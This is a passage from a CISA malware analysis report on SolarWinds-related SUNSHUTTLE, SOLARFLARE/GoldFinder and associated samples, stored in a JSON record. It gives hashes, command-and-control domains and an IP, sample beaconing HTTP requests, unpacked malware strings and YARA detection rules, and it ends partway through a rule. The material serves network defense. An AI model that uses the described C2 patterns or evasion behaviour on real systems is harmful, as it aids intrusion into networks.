{
	"id": "c38c20c4-138b-485c-b2ef-aaa9bea9f26f",
	"created_at": "2026-04-06T00:09:34.507401Z",
	"updated_at": "2026-04-10T13:11:33.527211Z",
	"deleted_at": null,
	"sha1_hash": "ae59e3a21c3da214423167f397d741426dbfd9c3",
	"title": "MAR-10327841-1.v1 – SUNSHUTTLE | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 198625,
	"plain_text": "MAR-10327841-1.v1 – SUNSHUTTLE | CISA\r\nPublished: 2021-04-15 · Archived: 2026-04-05 20:54:45 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.cisa.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security\r\nAgency (CISA) and the Cyber National Mission Force (CNMF) of U.S. Cyber Command. This report provides detailed\r\nanalysis of several malicious samples and artifacts associated with the supply chain compromise of SolarWinds Orion\r\nnetwork management software, attributed by the U.S. Government to the Russian SVR Foreign Intelligence Service (APT\r\n29, Cozy Bear, The Dukes). CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to\r\nmalicious activity. This MAR includes suggested response actions and recommended mitigation techniques.\r\nThis report analyzes eighteen (18) files categorized by their associative behavior and structured configurations.\r\nSeven (7) of the analyzed files are executables that attempt to connect to hard-coded command and control (C2) servers\r\nusing Hypertext Transfer Protocol Secure (HTTPS) on port 443 and await a response upon execution.\r\n   • Three (3) executables written in Golang (Go) and packed using the Ultimate Packer for Executables (UPX) were\r\nidentified by the security company FireEye as SOLARFLARE malware. One (1) of which was unpacked and included in\r\nthis report.\r\n   • Four (4) executables written in Go were identified by FireEye as SUNSHUTTLE. Two (2) of which were unpacked and\r\nincluded in this report.\r\nOne (1) file is a text file that appears to be a configuration file for a SUNSHUTTLE sample.\r\nSix (6) files are Visual Basic Script (VBScript) files designed to add the Windows registry keys to store and execute an\r\nobfuscated VBScript to download and execute a malicious payload from its C2 server. The VBScripts were identified as\r\nMISPRINT/SIBOT.\r\nOne (1) file was identified as a China Chopper webshell server-side component. The webshell was observed on a network\r\nwith an active SUNSHUTTLE infection, which would provide the actor with an alternative method of accessing the network\r\nif the SUNSHUTTLE infection was remediated.\r\nFor more information on SolarWinds-related activity visit: https://us-cert.cisa.gov/remediating-apt-compromised-networks.\r\nFor a downloadable copy of IOCs, see: MAR-10327841-1.v1.stix\r\nClick here for a PDF version of this report.\r\nSubmitted Files (14)\r\n0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9 (finder.exe)\r\n0d770e0d6ee77ed9d53500688831040b83b53b9de82afa586f20bb1894ee7116 (owafont.aspx)\r\n4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec (bootcats.exe)\r\n6b01eeef147d9e0cd6445f90e55e467b930df2de5d74e3d2f7610e80f2c5a2cd (f3.exe)\r\n7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb ( rundll32registry_createremote...)\r\n88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07 (prnmngrz.vbs)\r\n94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45 (Lexicon.exeUnPacked)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 1 of 44\n\nacc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66 (rundll32registry_schtaskdaily....)\r\nb9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8 (Lexicon.exe)\r\ncb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c (prndrvrn.vbs)\r\ne9ddf486e5aeac02fc279659b72a1bec97103f413e089d8fabc30175f4cdbf15 (rundll32file_schtaskdaily.vbs)\r\nec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def (SchCachedSvc.exe)\r\nf28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c (WindowsDSVC.exe)\r\nf2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2 (f2.exe)\r\nAdditional Files (4)\r\na9037af30ff270901e9d5c2ee5ba41d547bc19c880f5cb27f50428f9715d318f (Final_vbscript.vbs)\r\nbc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df (runlog.dat.tmp)\r\nd8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d (finder.exe_Unpacked)\r\nfa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836 (WindowsDSVC.exe_Unpacked)\r\nDomains (5)\r\neyetechltd.com\r\nmegatoolkit.com\r\nnikeoutletinc.org\r\nreyweb.com\r\nsense4baby.fr\r\nIPs (1)\r\n185.225.69.69\r\nFindings\r\n0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9\r\nTags\r\ntrojan\r\nDetails\r\nName finder.exe\r\nSize 1940480 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 1d97d76afefaa09556683c2fcd875baa\r\nSHA1 90651ee3dde5fe80ec52f13c487715bb5f04f6b6\r\nSHA256 0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9\r\nSHA512 effca75ac9103f23006efa7fbb8e3fea2a1f426f63d0153bbce286c0262d5a470e206beb0fb6a67ec963fddbd556790bcd0432a96aa8b7ce606\r\nssdeep 49152:o7fPmMDelNw0jQRtsBbsj3IpWrmxkpe14yn8:UWrQRtMpge2yn\r\nEntropy 7.873884\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.284134\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 2 of 44\n\nEmsisoft Gen:Variant.Bulz.284134 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.284134\r\nMicrosoft Security Essentials Trojan:Win64/GoldFinder.A!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n5c227744852a6ceb12cdb8d238e6d89a header 512 2.467962\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n9f091240d6d7fcdcffa6dae025085ffd UPX1 1939456 7.874501\r\n50620caa4cae52ec3a75710e0140e092 UPX2 512 1.661240\r\nRelationships\r\n0affab34d9... Contains d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\nDescription\r\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified as SOLARFLARE/GoldFinder\r\nmalware. The executable is UPX packed and when executed, the application will unpack and execute\r\n(d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d) in memory.\r\nd8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\nTags\r\ntrojan\r\nDetails\r\nName finder.exe_Unpacked\r\nSize 4947968 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 86e0f3071c3b3feecf36ea13891633fb\r\nSHA1 9f9f3b73e586e376fd81c6bdb75476fc3d37789c\r\nSHA256 d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\nSHA512 a3cb2771a7fe2419621865230cecf4105e5323e9e99edc7f863b7dea9db0646647b2a83c9e5b99ef0c92a58d890c1fc18069d24f3d3704396\r\nssdeep 49152:F3oUWn0hg/SlNpppOgFq/ANwhtB7ZUgB2SMS9AOE1w5ZRXR5/lTpJ6JwBS5g+A:qpx6bcVywhtB1Tx57X+A\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 3 of 44\n\nEntropy 5.958753\r\nAntivirus\r\nAhnlab Trojan/Win64.Cobalt\r\nBitDefender Gen:Variant.Bulz.284134\r\nEmsisoft Gen:Variant.Bulz.284134 (B)\r\nIkarus Trojan.Crypter\r\nLavasoft Gen:Variant.Bulz.284134\r\nMicrosoft Security Essentials Trojan:Win64/GoldFinder.A!dha\r\nYARA Rules\r\nrule CISA_3P_10327841_01 : SOLARFLARE trojan\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841.r1.v1\"\r\n       Date = \"2021-03-04\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan\"\r\n       Family = \"SOLARFLARE\"\r\n       Description = \"Detects strings in Finder_exe samples\"\r\n       MD5_1 = \"86e0f3071c3b3feecf36ea13891633fb\"\r\n       SHA256_1 = \"d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\"\r\n   strings:\r\n       $Go_Lang = \"Go build ID:\"\r\n       $main_func = \"main.main\"\r\n       $main_encrypt = \"main.func1\"\r\n       $StatusCode = \"StatusCode:\"\r\n       $Headers = \"Headers:\"\r\n       $Data = \"Data:\"\r\n       $Target = \"Target:\"\r\n   condition:\r\n       (uint16(0) == 0x5A4D) and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nc986ba8e4a156864e2afff2732285838 header 1536 1.243612\r\n4a26b87fa44a548f2d6d6a3d2cf09fb2 .text 2284544 5.911172\r\n46e1b5a3734e729d9bdce0a14120c910 .rdata 2400768 5.329403\r\n952ce42dcbf61c3fac54c2c958e0c551 .data 259072 5.567652\r\n52887da2b4d17327b2d67732484c11c2 .idata 1536 2.877795\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 4 of 44\n\nMD5 Name Raw Size Entropy\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nRelationships\r\nd8009ad960... Connected_To 185.225.69.69\r\nd8009ad960... Contained_Within 0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9\r\nDescription\r\nThe file is an 64-bit Windows executable file. This file is the UPX unpacked sample from the UPX packed sample\r\n\"finder.exe\" (0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9). The application is written in the\r\nGolang (Go) open-source language. The application is designed to detect servers and network redirectors such as network\r\nsecurity devices between the compromised systems and the C2 server. When executed, it attempts to connect to its C2 server\r\nusing HTTPS on port 443. Once connection is established, it will log all of the HTTP request and response information\r\nfrom/to the hard-coded C2 in plaintext into \"%current directory%\\loglog.txt\" (Figure 1)\r\nThe malware uses the following hard-coded labels to store the request and response information in the log file:\r\nTarget: The C2 URI\r\nStatusCode: HTTP response/status code\r\nHeaders: HTTP response headers and the values\r\nData: Data from the HTTP response received from the C2\r\nDisplayed below are sample HTTP request sent:\r\n--Begin sample request--\r\nGET / HTTP/1.1\r\nHost: 185.225.69.69\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n--End sample request--\r\nScreenshots\r\nFigure 1 - Screenshot of the log file.\r\n185.225.69.69\r\nTags\r\ncommand-and-control\r\nURLs\r\nhxxps[:]//185.225.69.69/live\r\nPorts\r\n443 TCP\r\nHTTP Sessions\r\nGET / HTTP/1.1\r\nHost: 185.225.69.69\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\nGET /live/ HTTP/1.1\r\nHost: 185.225.69.69\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nCookie: wDacJ87epY=8aebf98f920a2a198c00d87c246572b9; hBZ38QSGIR7UgOKT=NZQWAvMR6VGKA;\r\n0aUvm7fgB4UB5=IhFr8BnqYbP8ZZg1Zi8VPQWKQTXdRG8q; CLAshlHL1M=114\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 5 of 44\n\nReferer: www[.]google.com    \r\nAccept-Encoding: gzip\r\nWhois\r\ninetnum:        185.225.68.0 - 185.225.71.255\r\nnetname:        HU-XET-20171012\r\ncountry:        HU\r\norg:            ORG-XK7-RIPE\r\nadmin-c:        XL650-RIPE\r\ntech-c:         XL650-RIPE\r\nstatus:         ALLOCATED PA\r\nmnt-by:         RIPE-NCC-HM-MNT\r\nmnt-by:         hu-xet-1-mnt\r\ncreated:        2017-10-12T13:51:43Z\r\nlast-modified: 2017-10-12T13:51:43Z\r\nsource:         RIPE\r\norganisation: ORG-XK7-RIPE\r\norg-name:     XET Kft.\r\ncountry:        HU\r\norg-type:     LIR\r\naddress:        Fraknó u. 8/B 1/4\r\naddress:        1115\r\naddress:        Budapest\r\naddress:        HUNGARY\r\ne-mail:         info@xethost.com\r\nadmin-c:        XL650-RIPE\r\ntech-c:         XL650-RIPE\r\nabuse-c:        AR43371-RIPE\r\nmnt-ref:        hu-xet-1-mnt\r\nmnt-by:         RIPE-NCC-HM-MNT\r\nmnt-by:         hu-xet-1-mnt\r\ncreated:        2017-10-10T14:51:34Z\r\nlast-modified: 2020-12-16T12:18:59Z\r\nsource:         RIPE\r\nphone:         +36702451572\r\norg:            ORG-XK7-RIPE\r\naddress:        Fraknó u. 8/B 1/4\r\naddress:        1115\r\naddress:        Budapest\r\naddress:        HUNGARY\r\nphone:         +36309374590\r\nnic-hdl:        XL650-RIPE\r\nmnt-by:         hu-xet-1-mnt\r\ncreated:        2017-10-10T14:51:33Z\r\nlast-modified: 2019-10-09T11:32:49Z\r\nsource:         RIPE\r\ne-mail:         support@xethost.com\r\n% Information related to '185.225.68.0/22AS30836'\r\nroute:         185.225.68.0/22\r\ndescr:         Originated to Xethost by 23Net\r\norigin:         AS30836\r\nmnt-by:         hu-xet-1-mnt\r\nmnt-by:         NET23-MNT\r\ncreated:        2017-10-17T13:35:44Z\r\nlast-modified: 2017-10-17T13:35:44Z\r\nsource:         RIPE\r\nRelationships\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 6 of 44\n\n185.225.69.69 Connected_From d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\n185.225.69.69 Connected_From fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nDescription\r\nFinder.exe (0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9) and WindowsDSVC.exe\r\n(f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c) attempt to connect to this IP address.\r\nf2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2\r\nTags\r\ntrojan\r\nDetails\r\nName f2.exe\r\nSize 1940480 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 f67f71503026181c8499b5709b2b51c4\r\nSHA1 e93278e0e1af7fc2f75fe50318fdba7abe2cec0d\r\nSHA256 f2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2\r\nSHA512 dc2b788118c5733df1f9addad0d1634eb4d150521a042f0a09726a73cbf3b7682f5ce7a603ffc41871f54fe03c646529559df795586eb6a50c\r\nssdeep 49152:+nHBoTLO0y0UvN+4EK4KnQ4Ub9r0/pVXoUz7NPA6Cl:0HEO0qz4KnQJbV+h7NP+\r\nEntropy 7.874162\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.284134\r\nEmsisoft Gen:Variant.Bulz.284134 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.284134\r\nMicrosoft Security Essentials Trojan:Win64/GoldFinder.A!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n657af7f5c4c96b7699b37a285b3bb95d header 512 2.462581\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 7 of 44\n\n---\ntitle: INetSim default HTML page\n---\nMD5 Name Raw Size Entropy\naf51298804473081a36388c4452f0717 UPX1 1939456 7.874774\n50620caa4cae52ec3a75710e0140e092 UPX2 512 1.661240\nRelationships\nf2a8bdf135... Connected_To nikeoutletinc.org\nDescription\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified as SOLARFLARE/GoldFinder\nmalware. F2.exe is a variant of SOLARFLARE/GoldFinder, a stage 2 environmental analysis tool that was used in tandem\nwith SUNSHUTTLE/GoldMax. F2.exe checks the network capabilities of the host machine in order to identify the host as a\nfuture platform for SUNSHUTTLE/GoldMax. F2.exe is nearly identical to the “finder.exe” sample\n(0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9), differing only by the domain it\ncommunicates.\nUpon execution, it reaches out to the hard-coded domain nikeoutletinc.org over port 443 while also creating a file in its\nrunning directory called “loglog.txt.” As it receives a 200 OK from the specified domain, the details of the response are\nappended to the “loglog.txt” file and the executable exits. This connection is using HTTPS TLSv1.2 for encryption. After\nrunning, f2.exe closes and does not have persistence to run itself. This tool is meant to generate innocent-looking traffic to\nprod the network defense posture and determine whether the infected host is able to reach out to the internet. Next, another\nversion of “finder” would be used to determine connectivity to the C2 domain. In the compromise associated with this\nf2.exe sample, a nearly identical file named f3.exe performed the role of reaching out to the C2 domain. This file does not\nneed administrator privileges to run.\nAfter unpacking the sample, displayed below are strings of interest:\n--Begin strings of interest--\nhxxps[:]//nikeoutletinc.org/id (%v) \u003c= evictCount (%v)initSpan: unaligned lengthinvalid port %q after hostinvalid request\ndescriptormalformed HTTP status codemalformed chunked encodingname not unique on networknet/http: request\ncanceledno CSI structure available\nGo build ID:\n\"XoNtlAkjvYqniOio6xGI/0DIub_zdwXYX9I94QTxf/mSa3AXim2woQ8ym8GoD-/H3vqlJigkBWLlKW0U7Eq\"\n--End strings of interest--\nDisplayed below are loglog.txt contents after running f2.exe in a lab environment to mimic network traffic:\n2021/03/17 10:36:35 Target: hxxps[:]//nikeoutletinc.org/\n2021/03/17 10:36:35 StatusCode: 200\n2021/03/17 10:36:35 Headers: map[Content-Length:[258] Content-Type:[text/html] Date:[Wed, 17 Mar 2021 14:36:35\nGMT] Server:[INetSim HTTPs Server]]\n2021/03/17 10:36:35 Data:\n2021/03/17 10:36:35\n\nThis is the default HTML page for INetSim HTTP server fake mode.\n\nThis file is an HTML document.\n\nIf no network connection exists the file will contain:\n2021/03/17 10:38:46 Get \"hxxps[:]//nikeoutletinc.org/\": dial tcp 192.168.1.1:443: connectex: No connection could be made\nbecause the target machine actively refused it.\nnikeoutletinc.org\nTags\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\nPage 8 of 44\n\ncommand-and-control\r\nWhois\r\nDomain Name: NIKEOUTLETINC.ORG\r\nRegistry Domain ID: D402200000007305706-LROR\r\nRegistrar WHOIS Server: whois.namesilo.com\r\nRegistrar URL: www.namesilo.com\r\nUpdated Date: 2020-07-28T09:05:28Z\r\nCreation Date: 2018-08-22T18:44:46Z\r\nRegistry Expiry Date: 2021-08-22T18:44:46Z\r\nRegistrar Registration Expiration Date:\r\nRegistrar: Namesilo, LLC\r\nRegistrar IANA ID: 1479\r\nRegistrar Abuse Contact Email: abuse@namesilo.com\r\nRegistrar Abuse Contact Phone: +1.4805240066\r\nReseller:\r\nDomain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited\r\nRegistrant Organization: See PrivacyGuardian.org\r\nRegistrant State/Province: AZ\r\nRegistrant Country: US\r\nName Server: NS35.HOSTERBOX.COM\r\nName Server: NS36.HOSTERBOX.COM\r\nDNSSEC: unsigned\r\nURL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)\r\nRelationships\r\nnikeoutletinc.org Connected_From ec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def\r\nnikeoutletinc.org Connected_From f2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2\r\nDescription\r\nf2.exe (f2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2) and SchCachedSvc.exe\r\n(ec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def) attempt to connect to this domain.\r\n6b01eeef147d9e0cd6445f90e55e467b930df2de5d74e3d2f7610e80f2c5a2cd\r\nTags\r\ntrojan\r\nDetails\r\nName f3.exe\r\nSize 1939968 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 f50e89488b82622b4dd1a35a599a56ec\r\nSHA1 90b76eb47c0a6a7ccb2017b55cee6df88b55b6bb\r\nSHA256 6b01eeef147d9e0cd6445f90e55e467b930df2de5d74e3d2f7610e80f2c5a2cd\r\nSHA512 b71b488fac96298ad02158854a5227d60d5f5fa1651be1017b6b0f67289e4935bd83544d6cc7df6d6ab54b4fcf5741556d7b75f5d80a0c0ee\r\nssdeep 49152:BuGmlb/p27ls7+X1PgDd/oGKt4A2sPNrEUxw5acD:Klbh27A+Byd/IQs9Eu\r\nEntropy 7.873962\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.284134\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 9 of 44\n\nEmsisoft Gen:Variant.Bulz.284134 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.284134\r\nMicrosoft Security Essentials Trojan:Win64/GoldFinder.A!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n4743b4f0244c6163eb4fa96688360cea header 512 2.464055\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n11eafba3f3e1d220182ee43ca3d5c3ca UPX1 1938944 7.874568\r\n50620caa4cae52ec3a75710e0140e092 UPX2 512 1.661240\r\nDescription\r\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified as SOLARFLARE/GoldFinder\r\nmalware. F3.exe is a variant of SOLARFLARE/GoldFinder a stage 2 environmental analysis tool that was used in tandem\r\nwith SUNSHUTTLE/GoldMax. F3.exe checks the network capabilities of the host machine in order to identify the host as a\r\nfuture platform for SUNSHUTTLE/GoldMax. F3.exe is nearly identical to the “finder.exe” sample\r\n(0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9), differing only by the domain it\r\ncommunicates. Upon execution, it reaches out to the hard-coded domain google.com over port 443 while also creating a file\r\nin its running directory called “loglog.txt.” As it receives a 200 OK from the specified domain, the details of the response are\r\nappended to the “loglog.txt” file and the executable exits. This tool is meant to generate innocent-looking traffic to prod the\r\nnetwork defense posture and determine whether the infected host is able to reach the internet. Next, another version of\r\n“finder” would be used to determine connectivity to the C2 domain. In the compromise associated with this f3.exe sample, a\r\nnearly identical file named f2.exe performed the role of communicating to the C2 domain.\r\nf28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c\r\nTags\r\ntrojan\r\nDetails\r\nName WindowsDSVC.exe\r\nSize 2037248 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 e930633b2d99da097ef2dfff6734afab\r\nSHA1 1199a3bd32d9561b2827ed14a2e7d9093936d12f\r\nSHA256 f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 10 of 44\n\nSHA512 33203c83637d6e97481b4c8977892acaabade1543f5132f247f356bc7a623c481ae76eab2f8282e7b99a4c6417c9c5c422dfba85d33907aa5\r\nssdeep 49152:bqjCBg/1/zelmQLgGZRx9g4wwA3NnbgsPMfdLqEUI:bOCeFzelhL/TxEwwR0sk1Lqp\r\nEntropy 7.875073\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.370300\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Gen:Variant.Bulz.370300 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.370300\r\nMicrosoft Security Essentials Trojan:Win64/GoldMax.A!dha\r\nSophos Mal/GoldMax-A\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nb1ebe7f6d9f68ec788abf985f80220c9 header 512 2.484697\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n5fe74989ec393ccead259222602d437c UPX1 2036224 7.875650\r\n8b4f623319b09fd4b7d5fcdc5179f6ee UPX2 512 1.763456\r\nRelationships\r\nf28491b367... Contains fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nDescription\r\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified as SUNSHUTTLE/Goldmax\r\nmalware. The executable is UPX packed, and when executed, the application will unpack and execute\r\n(fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836) in memory.\r\nfa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName WindowsDSVC.exe_Unpacked\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 11 of 44\n\nSize 5180928 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 4de28110bfb88fdcdf4a0133e118d998\r\nSHA1 84ae7c2fee1c36822c8b3e54aef31e82d86613c1\r\nSHA256 fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nSHA512 2202852702404e60aeb642cda3ecfe0136a39bac04d86a746c987fbcbd14be3b763961b67a19a013e23e66c8f0c0c03050933e2e27eeb8d60\r\nssdeep 49152:I4iyaNa/K/kLYvlGbdc55w/g0EuV+lU/VNW5HzuFNRQNAQQik2NXST9yXMw+37KI:nogIYY4bdaVE+lUNNW5iCvXno+A\r\nEntropy 5.962488\r\nAntivirus\r\nAhnlab Trojan/Win64.Cobalt\r\nBitDefender Gen:Variant.Bulz.370300\r\nClamAV Win.Malware.SUNSHUTTLE-9838970-0\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Gen:Variant.Bulz.370300 (B)\r\nIkarus Trojan.Crypter\r\nLavasoft Gen:Variant.Bulz.370300\r\nMicrosoft Security Essentials Trojan:Win64/GoldMax.A!dha\r\nSophos Mal/GoldMax-A\r\nSystweak trojan-backdoor.sunshuttle-r\r\nYARA Rules\r\nrule CISA_3P_10327841_02 : SOLARFLARE trojan\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841.r1.v1\"\r\n       Date = \"2021-03-04\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan\"\r\n       Family = \"SOLARFLARE\"\r\n       Description = \"Detects strings in WindowsDSVC_exe samples\"\r\n       MD5_1 = \"4de28110bfb88fdcdf4a0133e118d998\"\r\n       SHA256_1 = \"fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\"\r\n   strings:\r\n       $Go_Lang = \"Go build ID:\"\r\n       $main_func = \"main.main\"\r\n       $main_encrypt = \"main.encrypt\"\r\n       $main_MD5 = \"main.GetMD5Hash\"\r\n       $main_beacon = \"main.beaconing\"\r\n       $main_command = \"main.resolve_command\"\r\n       $main_key1 = \"main.request_session_key\"\r\n       $main_key2 = \"main.retrieve_session_key\"\r\n       $main_clean = \"main.clean_file\"\r\n       $main_wget = \"main.wget_file\"\r\n   condition:\r\n       (uint16(0) == 0x5A4D) and all of them\r\n}\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 12 of 44\n\nrule FireEye_21_00004531_01 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"main.request_session_key\"\r\n       $s2 = \"main.define_internal_settings\"\r\n       $s3 = \"main.send_file_part\"\r\n       $s4 = \"main.clean_file\"\r\n       $s5 = \"main.send_command_result\"\r\n       $s6 = \"main.retrieve_session_key\"\r\n       $s7 = \"main.save_internal_settings\"\r\n       $s8 = 